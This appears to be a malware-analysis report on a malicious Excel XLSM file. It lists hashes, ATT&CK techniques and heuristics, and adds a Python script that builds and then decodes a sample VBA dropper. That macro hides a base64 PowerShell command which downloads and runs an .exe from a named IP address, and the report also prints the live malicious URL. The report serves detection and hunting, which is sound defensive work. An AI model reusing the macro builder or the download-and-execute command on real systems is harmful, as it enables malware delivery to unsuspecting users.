Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 8aa3e1396cd5802e…

MALICIOUS

Office (OOXML) / .XLSM

Size: 363.9 KB
Created: 2021-08-19 14:03:52 UTC
Authoring application: Microsoft Excel 15.0300
MD5: 998da072875302919b2819e018eacf6f
SHA-1: 4bcb248983c0a37842cfae2bb13dcd1e6bc98c87
SHA-256: 8aa3e1396cd5802e840d87a5a0b370e28102cbe41669124981aa3d38738099a7
Risk score: 80

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File

The VBA macro in this XLSM file calls Shell() to launch PowerShell. The PowerShell command line is not stored as a single literal: the macro assembles it by concatenating several string fragments into one base64-encoded payload, a common trick to defeat simple string matching on the macro source. Once the fragments are joined and the base64 is decoded, the command attempts to download and execute a file from 'http://3.64.251.139/v3/2/7aa362103110.exe', which is downloader / dropper behaviour. Because the URL only appears after decoding, detection should key on the Shell()-to-PowerShell pattern and on decoding of encoded command arguments rather than on the URL string alone.
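To make the reconstruction step concrete, the following is an added example (not the report's own tooling and not the carved macros.bas): it builds a constructed macro in the shape described above, splitting a base64-encoded PowerShell command across concatenated string literals and passing the result to Shell(), then walks the VBA source the way an analyst would: rebuild each string variable from its `x = "..."` / `x = x & "..."` assignments, find the argument handed to Shell(), decode the `-EncodedCommand` argument (base64 over UTF-16LE), and pull URLs out of the decoded text. The download URL is the one the report extracted; the PowerShell command body and the `$env:TEMP\x.exe` destination are assumptions. The resolver only follows plain literal concatenation; it does not evaluate Chr(), StrReverse(), Replace() or other obfuscation that real samples often add.

```python
from __future__ import annotations

import base64
import re

# URL from the report; the command text around it is constructed for this example.
DOWNLOAD_URL = "http://3.64.251.139/v3/2/7aa362103110.exe"
PS_COMMAND = (
    "(New-Object Net.WebClient).DownloadFile('" + DOWNLOAD_URL + "',"
    "\"$env:TEMP\\x.exe\"); Start-Process \"$env:TEMP\\x.exe\""  # assumed drop path
)

# A VBA string literal; a doubled quote inside it stands for one quote.
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
# -EncodedCommand and the abbreviations PowerShell accepts most often.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL = re.compile(r"""https?://[^\s'"<>()]+""")


def encode_ps(command: str) -> str:
    """PowerShell's -EncodedCommand expects base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def build_sample_vba(command: str, chunk: int = 20) -> str:
    """Constructed macro: the base64 blob is split into concatenated literals."""
    b64 = encode_ps(command)
    lines = [
        "Sub Workbook_Open()",
        "    Dim cmd As String",
        '    cmd = "powershell.exe -NoP -W Hidden -Enc "',
    ]
    for i in range(0, len(b64), chunk):
        lines.append(f'    cmd = cmd & "{b64[i:i + chunk]}"')
    lines += ["    Shell cmd, vbHide", "End Sub"]
    return "\n".join(lines)


def resolve_string_vars(vba_source: str) -> dict[str, str]:
    """Rebuild string variables from `x = "..."` and `x = x & "..."` lines."""
    values: dict[str, str] = {}
    for line in vba_source.splitlines():
        m = re.match(r"\s*(\w+)\s*=\s*(.+)$", line)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2)
        joined = "".join(lit.replace('""', '"') for lit in STRING_LITERAL.findall(rhs))
        if re.match(r"\s*" + re.escape(name) + r"\s*&", rhs):
            values[name] = values.get(name, "") + joined  # self-append
        else:
            values[name] = joined  # fresh assignment overwrites
    return values


def shell_arguments(vba_source: str, values: dict[str, str]) -> list[str]:
    """Return the command string passed to each Shell() call (literal or variable)."""
    found = []
    for line in vba_source.splitlines():
        m = re.match(r"\s*(?:Call\s+)?Shell\b\s*\(?\s*(.*)$", line)
        if not m:
            continue
        arg = m.group(1)
        lit = STRING_LITERAL.match(arg)
        if lit:
            found.append(lit.group(1).replace('""', '"'))
            continue
        ident = re.match(r"(\w+)", arg)
        if ident and ident.group(1) in values:
            found.append(values[ident.group(1)])
    return found


def decode_encoded_command(cmdline: str) -> str | None:
    """Decode a -EncodedCommand argument; None if absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(vba_source: str) -> list[dict]:
    """For every Shell() call: the rebuilt argument, its decoded payload, and any URLs."""
    values = resolve_string_vars(vba_source)
    report = []
    for cmd in shell_arguments(vba_source, values):
        decoded = decode_encoded_command(cmd)
        report.append({"shell_arg": cmd, "decoded": decoded, "urls": URL.findall(decoded or cmd)})
    return report


if __name__ == "__main__":
    for entry in analyze(build_sample_vba(PS_COMMAND)):
        print("Shell() argument:", entry["shell_arg"][:60] + "...")
        print("Decoded command :", entry["decoded"])
        print("URLs            :", entry["urls"])
```

Run against the carved macros.bas instead of the constructed sample by passing its text to `analyze()`; the `urls` field is what you would feed into blocking or hunting, and a Shell() argument that resolves to `powershell` with an encoded command is the signal behind the OLE_VBA_SHELL heuristic regardless of which URL the payload carries.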

Heuristics (2)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains vbaProject.bin, so VBA macros are present

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
    Size: 2633 bytes
    SHA-256: 6c28e1d8e4c3c5b69511d454acc96870192150731ea55be6b2293e62e61866fe
  • vbaProject_00.bin
    Kind: vba-project
    Source: OOXML VBA project: xl/vbaProject.bin
    Size: 6144 bytes
    SHA-256: fca1179e472a2996fad69d8e2a3f04957c05c40c299334562d42086e8ce74e58